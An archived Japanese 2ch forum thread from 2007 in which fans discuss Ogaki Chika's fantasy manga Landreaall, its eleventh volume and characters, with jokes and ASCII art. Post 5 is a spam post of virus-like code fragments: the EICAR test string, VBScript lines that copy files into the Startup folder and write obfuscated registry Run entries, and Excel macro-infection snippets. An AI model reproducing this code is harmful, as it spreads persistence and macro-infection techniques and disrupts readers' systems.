5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

おがきちか●Landreaall・エビアン他●12

1 :花と名無しさん:2007/11/04(日) 16:24:43 ID:???0
一迅社ゼロサムでファンタジー「Landreaall(ランドリオール)」を
連載中のおがきちか(=花丸木リカ)先生のスレッドです。

・sage推奨
・作家公式サイトの日記やBBSネタへの絡みはほどほどに
・次スレは>>980が立ててください
・感想、ネタバレは公式発売日正午までお控えください
・荒らしなどは基本的にスルーしましょう

【前スレ】
おがきちか●Landreaall・エビアン他●11
http://anime2.2ch.net/test/read.cgi/gcomic/1183361203/l50

【関連スレ】
ZERO-SUM(ゼロサム)について語りましょう。第18話
http://anime2.2ch.net/test/read.cgi/gcomic/1183078088/

【まとめwiki 】
ttp://www15.atwiki.jp/landreaall/


2 :花と名無しさん:2007/11/04(日) 16:25:45 ID:???0
【過去ログ】
おがきちか●Landreaall・エビアン他●花丸木リカ
http://comic6.2ch.net/test/read.cgi/gcomic/1054671994/
おがきちか●Landreaall・エビアン他●2
http://comic6.2ch.net/test/read.cgi/gcomic/1101527895/
おがきちか●Landreaall・エビアン他●3
http://comic6.2ch.net/test/read.cgi/gcomic/1116417578/
おがきちか●Landreaall・エビアン他●4
http://comic6.2ch.net/test/read.cgi/gcomic/1122827137/
おがきちか●Landreaall・エビアン他●5
http://comic6.2ch.net/test/read.cgi/gcomic/1131909322/
おがきちか●Landreaall・エビアン他●6
http://comic6.2ch.net/test/read.cgi/gcomic/1138258661/
おがきちか●Landreaall・エビアン他●7
http://comic6.2ch.net/test/read.cgi/gcomic/1146196467/
おがきちか●Landreaall・エビアン他●8
http://comic6.2ch.net/test/read.cgi/gcomic/1151720694/
おがきちか●Landreaall・エビアン他●9
http://anime2.2ch.net/test/read.cgi/gcomic/1158499649/
おがきちか●Landreaall・エビアン他●10
http://anime2.2ch.net/test/read.cgi/gcomic/1172897645/




3 :花と名無しさん:2007/11/04(日) 16:26:46 ID:???0
【コミック情報】
少年画報社
「ハニー・クレイ・マイハニー」
「エビアンワンダー」全2巻

大都社
「チカマニアックス」

一迅社(旧 一賽舎)
「エビアンワンダー」全2巻
 (上記少年画報社刊分の新装版・書き下ろし有・サニーザトリッパーはなし)
「エビアンワンダーREACT」全2巻
「Landreaall」1〜10巻(以下続刊)

【良くある質問とその回答】
・「Landreaall(ランドリオール)」は、作者の造語で、Land+reaall。
・アンちゃん(アニューラス・バラライカ)の性別は最終回で明らかになる模様。
まんがの森の冊子「とらだよ」インタビューより。
ttp://www.toranoana.jp/webdayo/nocomic/ncomic50.html

4 :花と名無しさん:2007/11/04(日) 17:00:47 ID:???0
11巻は面白いですか?

5 :花と名無しさん:2007/11/04(日) 18:36:22 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/11/04(日) 21:08:37 ID:???O
>>1乙です

7 :花と名無しさん:2007/11/04(日) 21:26:17 ID:???0
>>1


御礼にチョコをあげましょう
あっここにサインもしてくれると嬉しいなw

8 :花と名無しさん:2007/11/04(日) 21:59:29 ID:???0
前スレの1000
リドのシャンプー発売はイイ(^-^)/
世界も嫉妬する髪。出たら買う

9 :花と名無しさん:2007/11/04(日) 22:21:09 ID:???0
いやリンスだって。

自分も欲しいよコレは。

10 :花と名無しさん:2007/11/04(日) 22:39:36 ID:???0
>つるつるリンス

土中の芋虫が原材料なんですけどw

11 :花と名無しさん:2007/11/04(日) 22:51:13 ID:???0
湖に肉食魚モンスターがいるかも、とDXが言った時
なんとなく小さなピラニアを連想したが
まさかナマズとは意表をつかれた

12 :花と名無しさん:2007/11/04(日) 22:59:19 ID:???0
は?何言ってんだ?

13 :花と名無しさん:2007/11/04(日) 23:02:44 ID:???0
ナマズ氏は、何食べてああ大きくなったのだろうか。
お屋敷の庭だというのに・・・・
あとリンスの材料ってきのこじゃないっけ?

14 :花と名無しさん:2007/11/04(日) 23:28:28 ID:???0
雷鯰だから
電気ウナギの能力持ったナマズか

深い湖なんだね

15 :花と名無しさん:2007/11/05(月) 12:12:22 ID:???0
前スレ>>993
一瞬性転換でもしたのかと思ったじゃないか。

16 :花と名無しさん:2007/11/05(月) 15:25:13 ID:???0
自分も「元男の子」で今は女の子なのかと思ってしまったwww

そんでもって雷鯰の「鯰」が何て字か読めてなかった自分アホスw
ナマズって江戸時代くらいに地震の原因って言われてたやつだよな。
地竜と地繋がりか。祓わなければ起きるっていう大災害って
5巻のデフォルメ絵のとおり地震っぽいな。

17 :花と名無しさん:2007/11/05(月) 19:00:45 ID:???0
しかしもう名乗ったからには完全に外交レベルの問題だよなぁ。
まぁ色々決着した後で、
事を公にしたくないからとさっきの名乗りは
誰も聞いてなかった事になる可能性はあるけど。


18 :花と名無しさん:2007/11/07(水) 21:37:04 ID:???0
>雷鯰
元々鯰が棲む湖に屋敷を建てたのか
或いは屋敷を建ててから番犬として鯰を飼い始めたのか

飼ってるんだとしたら濤家で餌を与えてるんだろうか
…肉食魚に何を…

19 :花と名無しさん:2007/11/07(水) 21:44:03 ID:???0
当然、濤家に仇成す者を闇から闇へ・・・

20 :花と名無しさん:2007/11/07(水) 21:47:55 ID:???0
>11
あれは堀じゃなかったか?

21 :花と名無しさん:2007/11/07(水) 22:04:11 ID:???0
堀だったっけ?
そうだとしても、主とか皆が知ってるらしいから
何か食べられちゃった・・・・・・・んだよね。

22 :花と名無しさん:2007/11/07(水) 22:21:25 ID:???0
>>20
ジェムを覗きながら「リドがいるのは湖の中心、領主の館の本家っぽいぞ」って言ってたから

鯨のような大きさだけどナマズなんだよね
>>16の言うように地震とかんけいあるのかな
(地竜による)天災の予知探知の役目もあるのかも

23 :花と名無しさん:2007/11/08(木) 01:56:04 ID:???O
前スレの…ナンバー忘れちゃったけどエビアン薦めてくれたヒト
探したけど地方本屋にはエビアン02とリアクト01しかなかったorz
起承転結中、承と転だけ買って『読まずに』残りを買う、ということが


私には出来なかったっ!
オレ、人として弱っ!

24 :花と名無しさん:2007/11/08(木) 02:31:15 ID:???0
つ Amazon

25 :花と名無しさん:2007/11/08(木) 03:22:30 ID:???0
エビアンは起承承テ結!って感じだ

26 :花と名無しさん:2007/11/08(木) 17:54:09 ID:???0
起結転結じゃないか?

27 :花と名無しさん:2007/11/08(木) 20:14:14 ID:???0
爆砕点結

28 :花と名無しさん:2007/11/08(木) 22:51:21 ID:???O
>>24
あ、その手があったか〜早速注文だ〜

>>25>26>27
丁度4巻だったので起承転結と言っただけだったのだが、奥の深さがよく解ったよ。ありがとう

Amazon!急いで届けてくれたまえ!

29 :花と名無しさん:2007/11/08(木) 22:53:51 ID:???0
Amazon「わかりました。次の荷馬車に乗せます。」

30 :花と名無しさん:2007/11/08(木) 22:55:28 ID:???0
たまたま早便の荷馬車があったので、そちらに乗せてもらったら
予定より早く届いてしまいました。

31 :花と名無しさん:2007/11/09(金) 00:03:11 ID:???O
おお!そしてランドリ初話になるのか
それって素敵ね

32 :花と名無しさん:2007/11/09(金) 00:09:25 ID:???0
そして火竜との戦いに敗れる>>28であった

33 :花と名無しさん:2007/11/09(金) 02:40:47 ID:???0
リアクトのラスト、少女召還の場面で泣くのは俺だけ?
何故か泣いてしまうw

34 :花と名無しさん:2007/11/11(日) 22:51:24 ID:???O
木曜の深夜に注文して、土曜の朝届いた
Amazon仕事速ぇ〜

そしてさっきエビアン読了〜
フェイの正体に途中で気付いちゃったけど、それでもお釣りがきたお得感
ランドリの、3巻までが本質的な構築が一緒ってなんかで読んだけど、登場人物のキャラや立場が違うから全然気にならなかった
いい買い物をした。Amazonとココの住人サンキスト


>32 普通みんな敗れます。リゲインとユンケルで痛み分けですもの。オイラにゃあ無理です
>33 必死に読んでたから君の気持ちはワカラナイ
今からもっかい読むので、ひょっとしたらひょっとするかも

35 :花と名無しさん:2007/11/13(火) 21:53:14 ID:???0
>33
あそこは現在の自分のおかれている状況よりも、
まず少女の境遇を心配するフレデリカが切なかったね。
あれだけ修羅場をくぐってきたのに、なんて心の綺麗な人なんだろうと思った。

36 :花と名無しさん:2007/11/14(水) 22:17:26 ID:???0
今頃ゼロサム読んでみた。

とうとう、権力という名の魔法のステッキを手にしてしまったな!
今後の成長が楽しみだ。

37 :花と名無しさん:2007/11/15(木) 02:40:50 ID:???0
これっきりの可能性も高いと思う

38 :花と名無しさん:2007/11/15(木) 12:30:43 ID:???0
DX王様になったほうが面白そう
なったあとの話は読めなさそうだけど

39 :花と名無しさん:2007/11/15(木) 15:18:46 ID:???0
王様になっても、なんでも議会で決めちゃうのでやることなさそう
んでこっそり抜け出して(ry
という展開が見えた

40 :花と名無しさん:2007/11/15(木) 18:17:03 ID:???0
>38
なら面白く無いじゃん。

41 :花と名無しさん:2007/11/15(木) 20:57:15 ID:???0
>>40
なる過程までの話が面白そうということじゃないの

42 :花と名無しさん:2007/11/16(金) 00:48:58 ID:???0
>>38
…周りが大変そう…

43 :花と名無しさん:2007/11/16(金) 00:56:57 ID:???0
>38
アンちゃんや六甲の胃に穴が……

tipsのフェレルのアカデミー時代話は何度読んでもたまらんw
タリオ夫人が同時期にアカデミーにいたりしてたら、
DXはもっと目の仇にされてたかもしれんと思ったり。

44 :花と名無しさん:2007/11/17(土) 07:31:11 ID:???0
ファレル、な

45 :花と名無しさん:2007/11/17(土) 19:17:19 ID:???0
フォレル、な

46 :花と名無しさん:2007/11/18(日) 22:42:06 ID:???0
ファレノレ

47 :花と名無しさん:2007/11/18(日) 22:45:43 ID:???0
フィレル

48 :花と名無しさん:2007/11/18(日) 22:48:35 ID:???0
>45
男っぽいけど女だ。間違ってフォレルなよ。

49 :花と名無しさん:2007/11/18(日) 22:54:10 ID:???0
【審議中】
      _,,..,,,,_   _,,..,,,,_
   _,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_<イマドキ>>48ッテドーヨ?
  ./ ・ω_,,..,,,,_  l _,,..,,,,_/ω・ ヽ <サムイ?
 |   /   ・ヽ /・   ヽ    l <キョウハカゼモツヨカッタシネー
  `'ー--l      ll      l---‐´<ドウスル?
     `'ー---‐´`'ー---‐´

50 :花と名無しさん:2007/11/18(日) 23:56:05 ID:???0
【却下】
      _,,..,,,,_   _,,..,,,,_
   _,,..,,,_/ -ω-ヽ/-ω-ヽ,..,,,,_<アリエネー
  ./ -ω-,,..,,,,_  l _,,..,,,,_/-ω-ヽ <ダメダメ>>48ハメシケンヘイケ
 |   / -ω-ヽ /-ω-ヽ     l <メシケンハサムイジョークノフルサト
  `'ー--l      ll      l---‐´<ジョークノハカバ
     `'ー---‐´`'ー---‐´


51 :花と名無しさん:2007/11/19(月) 00:04:26 ID:???0
--------------------------------------------------------------------------------
        _.. -‐ ' "     ヽ ̄ノ^7__  )   |王|  ┴ ソ  十/  | |   | |  (
    `ー ''"--―――-r⌒``~`゙゙`''ヘ/  ヽ ニ|ニ|ニ  二 王  /レ、  レ |  | | (
     `ー--――ー--->  〜-、_, ',   ) ノ ヽ   口 我  Vン   ノ  ・・ (
      `ー-- .._ へ/   くてi` 〈    `V⌒V⌒WV⌒Y⌒VV⌒W⌒Y⌒`
       `ー-_   | ^i        , ノ                    _.. ‐ァ=r‐''⌒゙二ニ二つ
          ヽr''ヘ、_     ,.-=ァ/                _. -‐ '"´  l l    r} } }l
          /   !、   {__//    __      . -‐ ' "´        l ヽ  、 ヽ_ノノ
          ノ       、   ̄ /-‐ ' "´/`゙ ーァ' "´  ‐'"´         ヽ、`ーテヽJ
     _.. -‐''フ|フヽr-‐ ''''フ. ̄「´      /   /                __.. -'-'"
  . ‐ '7    く/|〉-rへ. /   l     l   /            . -‐ '"´
「再審を求めます!」

52 :花と名無しさん:2007/11/19(月) 02:37:37 ID:???0
【再審中】
               <デモ、ヨルハネル。
         <⌒/ヽ-、___
        <⌒/ヽ-、___/
      <⌒/ヽ-、___/
     <⌒/ヽ-、___/
   <⌒/ヽ-、___/
  <⌒/ヽ-、___/
/<_/____/

53 :花と名無しさん:2007/11/19(月) 02:42:58 ID:???0
【再審再開中】
    |∧∧|       (( ) )   (( ) )  ((⌒ )
 __(;゚Д゚)___  (( ) )   (( ⌒ )  (( ) )
 |⊂l >>48  l⊃ |    ノ火.,、   ノ人., 、  ノ人.,、
  ̄ ̄|.|.  .|| ̄ ̄    γノ)::)   γノ)::)   γノ)::) 
    |.|=.=.||       ゝ人ノ   ゝ火ノ  ゝ人ノ
    |∪∪|        || ∧,,∧ || ∧,,∧ ||  ボォオ
    |    |      ∧ (´・ω・) (・ω・`) ∧∧
    |    |      ( ´・ω) U) ( つと ノ(ω・` )
   ~~~~~~~~     | U (  ´・) (・`  ). .と ノ
              u-u (    ) (   ノ u-u
                  `u-u'. `u-u'


54 :花と名無しさん:2007/11/19(月) 10:46:35 ID:???0
>>48…安らかに眠れ

55 :花と名無しさん:2007/11/19(月) 20:45:06 ID:???0
飯研送りだけはイヤーーーーーーーーッ!!!

56 :花と名無しさん:2007/11/19(月) 20:53:20 ID:???0
飯研?

57 :花と名無しさん:2007/11/19(月) 21:39:45 ID:???0
たぶんコレ


飯研送り【めしけんおくり】
ハン板で駄洒落を言った者を飯研へと連行するAA。
『飯研』とは飯嶋酋長ことハン板のアイドル、ノムたんを見守る飯嶋酋長研究スレのこと。
ほんの数日で1000に達する非常に流れの速いスレだが、毎回のスレタイに駄洒落を織り込むのが慣わしとなっているため住人達は何かネタを見つけては駄洒落を繰り出している。
このため、ハン板では駄洒落に対して『飯研へ行け』とレスが付くようになり、更にはAAで直接連行するようになった。
門のAAは地獄門の改変と思われる。
また、最近は引きずられる以外にホームランで打ち込まれる、アッパーカットで吹っ飛ばされる、クックルが箱に詰めて直接運んでいく、UFOがさらって行くなど連行のバリエーションも増えている。


58 :花と名無しさん:2007/11/19(月) 22:38:42 ID:???0
なんでんな居たローカルなネタ使うかなぁ・・・

59 :花と名無しさん:2007/11/19(月) 23:23:34 ID:???0
流行らせたいんでしょ

60 :花と名無しさん:2007/11/20(火) 19:37:12 ID:???0
コミックス買ってきた。
さすがにはやいな。

61 :花と名無しさん:2007/11/20(火) 22:37:37 ID:???0
四日もフライングとは……
自分は発売日まで待って虎穴行くつもり。
ペーパーは結局何になったんだろ……。

62 :花と名無しさん:2007/11/22(木) 06:14:21 ID:???0
コミックス描きおろし?4コマ

Tailpiece




あーだれかフラッシュとかにしてくれないかな

63 :花と名無しさん:2007/11/22(木) 16:01:57 ID:???0
死ねよ。

64 :花と名無しさん:2007/11/22(木) 20:08:36 ID:???0
おがきちか先生代表作「Landreaall」11巻発売記念!
描き下ろしメッセージペーパープレゼント!!
ttp://www.toranoana.jp/shop/071122_land/

65 :花と名無しさん:2007/11/22(木) 20:11:19 ID:???0
一迅社もラノベ進出か…。

66 :花と名無しさん:2007/11/22(木) 20:12:48 ID:???0
死なねぇかなコイツら。

67 :花と名無しさん:2007/11/23(金) 00:19:22 ID:???0
最近エビアンにはまったんだけど、
エビアンの単行本以外の話ってランドリとの
2冊組小冊子だけかな?全サだったやつ?
読みたいけど読めない…ヤフオク高ぇ…。

68 :花と名無しさん:2007/11/23(金) 08:18:23 ID:???0
オク厨を利するようなマネだけはせんでくれよ。

69 :花と名無しさん:2007/11/23(金) 21:35:05 ID:???0
作者HPだと
秋葉原本店・なんば2号店は除く
と書いてありますが、とらのあなのHPだと
なんば2号店は除く
としか書いてありません、誰か確認した人いませんか?

70 :69:2007/11/23(金) 21:36:45 ID:???0
すみません、メッセージペーパー配布についての事です

71 :花と名無しさん:2007/11/23(金) 21:38:32 ID:???0
なぜ自分で確認しないのかな?

72 :花と名無しさん:2007/11/24(土) 05:28:40 ID:???0
本店はそもそも商業誌扱ってないからどっちも正しい。
http://www.toranoana.jp/shop/index.html#akiba

73 :花と名無しさん:2007/11/24(土) 05:32:45 ID:???0
ってなんば2号店も同人誌だけなのか。掲載の基準がよく分からないな。
まあ秋葉原もなんばも、ほぼ隣接した所に貰える店舗があるんだから
そっちに行けばいいよ。

74 :花と名無しさん:2007/11/24(土) 07:17:23 ID:???O
1号店ならもらえるんじゃねーの?
本店のすぐ隣りの

75 :花と名無しさん:2007/11/24(土) 13:31:53 ID:???0
ランドリ新刊買った
裏表紙の組み合わせは、なんかこう、随分珍しいね?

76 :花と名無しさん:2007/11/24(土) 15:15:34 ID:???0
単行本にはさんでたチラシで原作CDのキャスト出てたね
ソニアにびっくり

77 :花と名無しさん:2007/11/24(土) 15:54:26 ID:???0
アレかな、葵の兄さんは実は危険度アップ承知でロウトウぶった切って弟を助けるつもりだったのに
予想外の横槍ばっか&自分の行為を説明しない性格で事態が悪化の一方なのかなw

とりあえず無敵超人DXがボロボロにやられてて新鮮だわ〜。
一冊丸々シリアスでしんどいとこにイオンのダンスでもうダメすぎるww

78 :花と名無しさん:2007/11/24(土) 17:53:23 ID:???0
あらためて読み返すと、
「ごの期に及んでは何も」ってセリフが重いな。

79 :花と名無しさん:2007/11/24(土) 20:13:46 ID:???0
>>75
アレはウールンじゃなくて竜胆

80 :花と名無しさん:2007/11/24(土) 20:26:55 ID:???O
tailpiece最高

81 :花と名無しさん:2007/11/24(土) 21:34:11 ID:???0
番外編の風呂ネタ懐かしいな
二年前くらいじゃなかったけ?雑誌に載ったの
竜胆の顔が今と随分違ってる
担当さんにもっとかっこよく描けと言われてたころだっけか

82 :花と名無しさん:2007/11/24(土) 21:43:58 ID:???0
>80
同意

83 :花と名無しさん:2007/11/25(日) 00:19:40 ID:???O
風呂ネタは高田馬場漫画の森での複製原画展示の頃だから2005年かな?

いつコミクスに収録されるかわからんとかあって
ここでも物議をかもしたような記憶があるような
懐かしい

またしおりとかちまちました販促やってくれないかな〜

84 :花と名無しさん:2007/11/25(日) 02:09:07 ID:???0
あらためて読み返すと一のおっさんの苦労がしのばれるなw


85 :花と名無しさん:2007/11/25(日) 12:03:04 ID:???0
竜胆の兄ちゃんに惚れたわ
無邪気に傲慢なDXをへこましてくれる人がやっと現れたw

86 :花と名無しさん:2007/11/25(日) 12:55:03 ID:???0
考えてみると色んな属性がDXと真反対の人なんだなぁ。
ただ、己の生き方を通そうとするあまりに、
無自覚に周囲に波風立てて巻き込んでるのが共通点だが。

87 :花と名無しさん:2007/11/25(日) 14:26:29 ID:???O
わずか三ページだが、不足していたイオン分が潤うわ……。手を挙げてる絵かわいすぎだろ。

あと幼少時の竜胆ムチャクチャかわいいな、そりゃ兄ちゃんも複雑な気持ちになるか。

88 :花と名無しさん:2007/11/25(日) 15:16:11 ID:???0
もし竜胆が本当に女の子だったら

跡目継承争いにもならずお家は安泰
可愛い娘でおとうちゃんデレデレ
可愛い異母妹でおにいちゃんウハウハ
満月さまも正室の座や我が子の継承権になんの心配も無く
凪さまも満月さまに気兼ねする必要もなく、心労もなく長生き

全てが丸く収まったというかなんというか…
竜胆(女の子バージョン)はがっつりシスコンな兄に
ある意味苦労させられそうだけど。
ボーイフレンドが出来た時とか婿取りの時とか嫁入りの時とか。
「そんな男はお兄ちゃん許しません!!」って感じで。


89 :花と名無しさん:2007/11/25(日) 15:25:56 ID:???0
いやそんなキモヲタの幻想丸出しの妄想ストーリーみたいなの押し付けられても・・・

90 :花と名無しさん:2007/11/25(日) 15:31:34 ID:???0
にしても側室を嫡子生んだから正室に、
正室を子を生めなかったからと側室にするのは無茶苦茶だと思った。
普通に側室のままでも跡取りの母でいいんじゃないの?


91 :花と名無しさん:2007/11/25(日) 15:34:01 ID:???0
>>90
それは思った。
第二夫人でも嫡子の母、って立場でいいじゃないかと。

竜胆が女の子だったら、今頃竜葵とは仲睦まじかったんだろうな。

92 :花と名無しさん:2007/11/25(日) 15:56:57 ID:???0
ウールンって敬称じゃなくて名前だよね
なんでみんな呼び捨て?

93 :花と名無しさん:2007/11/25(日) 16:37:31 ID:???0
イオンも姫でややこしいから

94 :花と名無しさん:2007/11/25(日) 16:41:47 ID:???0
身分隠すためじゃないの?

95 :花と名無しさん:2007/11/25(日) 16:42:51 ID:???0
というかウールンは公主といったほうがいいんでない?
姫のが下なイメージ。

96 :花と名無しさん:2007/11/25(日) 17:17:58 ID:???0
>88
> もし竜胆が本当に女の子だったら

『竜胆はオレの嫁』と言い出すヤツが出て来る。

97 :花と名無しさん:2007/11/25(日) 17:20:09 ID:???0
公主は中国では姫だがバチカンでは公王ぐらいの意味だもんな
んでおしのびだから公主と呼ばないんだと思うよ

98 :花と名無しさん:2007/11/25(日) 17:34:07 ID:???0
せめて様つけてやればいいのに
DXはDXさまって呼んでるんだから

99 :花と名無しさん:2007/11/25(日) 18:00:51 ID:???0
>>86
自覚はしてるでしょ。
強力なリーダーシップで周りに有無を言わせないのもひとつのやり方だよ。

100 :花と名無しさん:2007/11/25(日) 18:33:23 ID:???0
???

101 :花と名無しさん:2007/11/25(日) 19:01:30 ID:???0
コミックス11巻買った。

Tailpieceワロタw

102 :花と名無しさん:2007/11/25(日) 19:30:14 ID:???0
近所の本屋には入荷していなかった。
車で走ればデカイ本屋があるから、そこなら確実に入荷しているだろうが、
路面凍結でまだ冬タイヤに交換していないからそこまで行けない…。

103 :花と名無しさん:2007/11/25(日) 19:41:26 ID:???0
だから?

104 :花と名無しさん:2007/11/25(日) 19:49:33 ID:???0
薄味のスープで塩分控えたけれど…

105 :花と名無しさん:2007/11/25(日) 19:59:40 ID:???0
俺としては妹成分をおかわりしたい

106 :花と名無しさん:2007/11/25(日) 20:04:17 ID:???0
イオンの創作ダンスって元ネタとかあるの?
何かの曲の替え歌とか…

107 :花と名無しさん:2007/11/25(日) 20:26:30 ID:???O
>>88
DXとの戦いが剣じゃなくてシスコン比べになっちゃうじゃないかw

108 :花と名無しさん:2007/11/25(日) 21:11:42 ID:???0
自分で・・

109 :107:2007/11/25(日) 22:43:06 ID:???O
あのさ……別に荒しに構うとかって訳じゃないんだから、誰が誰にレスするのまであーだこーだ言わないでくれないかな。
別人だよ、まったく。

110 :花と名無しさん:2007/11/25(日) 22:57:50 ID:???0
なんだろうこのひと

111 :花と名無しさん:2007/11/25(日) 23:14:56 ID:???0
???
なんか変な奴が来たな。

112 :花と名無しさん:2007/11/25(日) 23:24:31 ID:???0
>>108のレスが、
>>88.107,109が自演だと指摘してるものだと思ったんじゃないの

113 :花と名無しさん:2007/11/25(日) 23:38:29 ID:???0
>>109
きっとウイルスか誤爆じゃないのかな?
気にすんなよ。

114 :花と名無しさん:2007/11/25(日) 23:42:48 ID:???0
コミクスげっつ
Tailpieceは反則だろw
あと最初のほうで髪を上げているアンちゃんが好きだ

115 :花と名無しさん:2007/11/25(日) 23:44:45 ID:???0
>>108>>106へのコメントかも?
全然違うかもしれんがw

何はともあれ>>109 は自意識過剰w

116 :花と名無しさん:2007/11/25(日) 23:55:56 ID:???0
てか自意識過剰というより完全な自爆なんじゃ…。

117 :花と名無しさん:2007/11/26(月) 00:07:37 ID:???0
>>116
自爆っていうか>>88は自分なので
>>107と同一人物ではない。
>>108は他板でよく見る空気読むウイルスなのかと思ってた。
でも>>106へのレスだと思うと可愛いな。

イオンのダンス(歌も)SUGEEEEE
爆笑を堪えてる先生が良かったなw



118 :花と名無しさん:2007/11/26(月) 00:11:54 ID:1qDs/Raa0
イオンの歌の最後の「なんと」がよくわからないんだけど
あれは2重の倒置法ってことでいいの?

119 :花と名無しさん:2007/11/26(月) 00:21:59 ID:???0
つかイオンのダンスの意味自体分らん。
ああいうダンスは芸術なんたらではないということは分るんだが、
笑うとこなのかさえ分らなかった。
どういう意味があるの、あれ?

120 :花と名無しさん:2007/11/26(月) 00:34:28 ID:1qDs/Raa0
詩の授業で菜の花は刹那的って書いたのと同じような意味だと思う
イオンの天真爛漫さを表してるみたいな

笑いどころはオレもよく分からなかったけど
何度もじっくり見てたらじんわり笑えたなぁ

121 :106:2007/11/26(月) 00:35:38 ID:???0
>>119
私もイマイチわからなかったから聞いてみた

元ネタが何もないんだとすると…
ただ単に雰囲気を感じ取れてないってことかな
妹成分補充ってだけなら記号的にわかるが。

122 :花と名無しさん:2007/11/26(月) 00:39:53 ID:???0
>119
ギャグの意味を説明しろって言われてもな・・・

やってみてもいいがまずイオンがいかに可愛いかというところから
始めなくてはならない
しかしそれを始めるtこおスレの半分程を消費してしまうのでやっぱやらない

123 :花と名無しさん:2007/11/26(月) 01:07:28 ID:???0
数字コテもいい加減ウザい。

124 :花と名無しさん:2007/11/26(月) 02:49:25 ID:???0
ああいう笑いはアホ可愛さへの笑い、に対する感受性が必要

構造だけ説明すると、…そうだな 今日丁度あったことで説明すると
ステーキハウス指差して、幼い子供が、
「しってるよーあれはまくどなるとっていうんだよねー」(じまんげ)

…ってときの笑いに近い

場違いなことを真剣にやればやるほどアホで、可愛らしくて、笑える
あざとさ、わざとらしさ、作ってある感が一片でもあると成立しない

まあ、イオンが可愛いってことだな >122に同意

125 :花と名無しさん:2007/11/26(月) 04:05:44 ID:???0
>>100
竜葵は己の生き方というより、領主としての責任を果たしてるだけだろう。
人の上に立つ者の判断が時には波風を立てて多くの人を巻き込むのは当たり前で、
竜葵が無自覚に権力を振るってるとは思わない。
判断の是非は別として。

126 :86:2007/11/26(月) 11:11:05 ID:???0
いや別にそういうマクロな話でなくて、
もうちょっと個人の基本的な要素の部分の事を言ってたつもりなんだけどね。
領主の責任とか言い出すとDXはその地位に無いんだから比較しようが無い。

信頼に足ると思ってる人間が周囲に居てもそれに頼ろうとはせず、
自分の判断に責任は持つけど、
その理由と経緯をちゃんと説明しないからかえって混乱を招いたり、
挙句に結果も一人で丸々抱え込んで処理しようとするから、
結局は余計に周囲を巻き込んで事態が大きくなったりとか。

今の事態も、双方とも半分はどうしようもなく起きてしまった事だろうが、
半分は当人達が招いた部分が大きいんじゃないかと(他の方法がベストだったとは言わんが)。

だからこの件が落着したら、相身互いに気づかされる事も多いんじゃないかなと。

127 :花と名無しさん:2007/11/26(月) 19:40:14 ID:???0
DXの「相応の敬意を払う」でニガワラ。何言ってんだろうこのクソガキ。

128 :花と名無しさん:2007/11/26(月) 20:14:02 ID:???0
読むものが少なくて買わなくなっていたけど
続き読みたさに今月だけは本誌を買ってしまいそうだ・・・

129 :花と名無しさん:2007/11/26(月) 21:50:25 ID:???0
しかし考えてみると、
水戸黄門並の酷いやり口だよな。
名乗らず思いっきり不審者Aのまま怪しい振る舞いをした挙句、
挑発してやらせるだけやらせといて、
今更に名乗りを上げて実は高貴なお方でした…ってそりゃないだろうと。

130 :花と名無しさん:2007/11/26(月) 21:56:38 ID:???0
むしろどっちも引けなくなった千日手状態になってね?

131 :花と名無しさん:2007/11/26(月) 21:58:23 ID:???0
似てないけど似てるんだよな、兄上とDX
あの人らの下で働くのは大変だろうけどやりがいはあると思う

132 :花と名無しさん:2007/11/26(月) 22:02:58 ID:???0
>>129
でも一応、高貴な人、つーのはバレバレだったんでは?
ひどいやりくちなのは確かだが、正直どっちもどっちな気が

133 :花と名無しさん:2007/11/26(月) 22:23:41 ID:???0
>>131
似てるかなあ
DXは結局何でも自分が首突っ込みたいクチだし
弟気質の、悪く言えば依存体質のある人なら心地よくて上手くやれそうだけど

134 :花と名無しさん:2007/11/26(月) 23:49:26 ID:???0
>129
名乗ったら内政干渉になるから、
ギリギリまで言えなかったんではないかと。

しかし兄ちゃん引っ込みつかなくなってそうだw

135 :花と名無しさん:2007/11/27(火) 01:13:34 ID:???0
ハブランサス猫パンチ(((( ;゚Д゚)))ガクガクブルブル
あのサイズじゃ死ぬって

136 :花と名無しさん:2007/11/27(火) 01:23:47 ID:???0
>135
実は肉球がとてもふんわか。

137 :花と名無しさん:2007/11/27(火) 01:29:54 ID:???0
>>135
あそこは和んだ。そしてギャグに見えた

138 :花と名無しさん:2007/11/27(火) 18:04:10 ID:???0
>>126

> 信頼に足ると思ってる人間が周囲に居てもそれに頼ろうとはせず、
> 自分の判断に責任は持つけど、
> その理由と経緯をちゃんと説明しないからかえって混乱を招いたり、
> 挙句に結果も一人で丸々抱え込んで処理しようとするから、
> 結局は余計に周囲を巻き込んで事態が大きくなったりとか。

↑コレ竜葵のこと?DXのこと?w

139 :花と名無しさん:2007/11/27(火) 19:53:50 ID:???0
どっちもでしょ
>86は「共通点」て書いてる

140 :花と名無しさん:2007/11/27(火) 21:14:18 ID:???0
>138は何が言いたかったんだ?
w入れて何か煽りたかったのか?


141 :花と名無しさん:2007/11/27(火) 21:21:56 ID:???0
一々指摘する方も同類だろ… スルーしとけ

142 :花と名無しさん:2007/11/28(水) 09:27:17 ID:???0
>>129
確かに水戸黄門だw

143 :花と名無しさん:2007/11/28(水) 14:27:26 ID:???0
>>126
なるほどね。竜葵も弟をぶった切ろうとしたことだけは(真意は置いといて)暴走と言えなくもない。
おかげで、単なる侵入者であるDXに大義名分を与えちゃったのは皮肉なことだ。
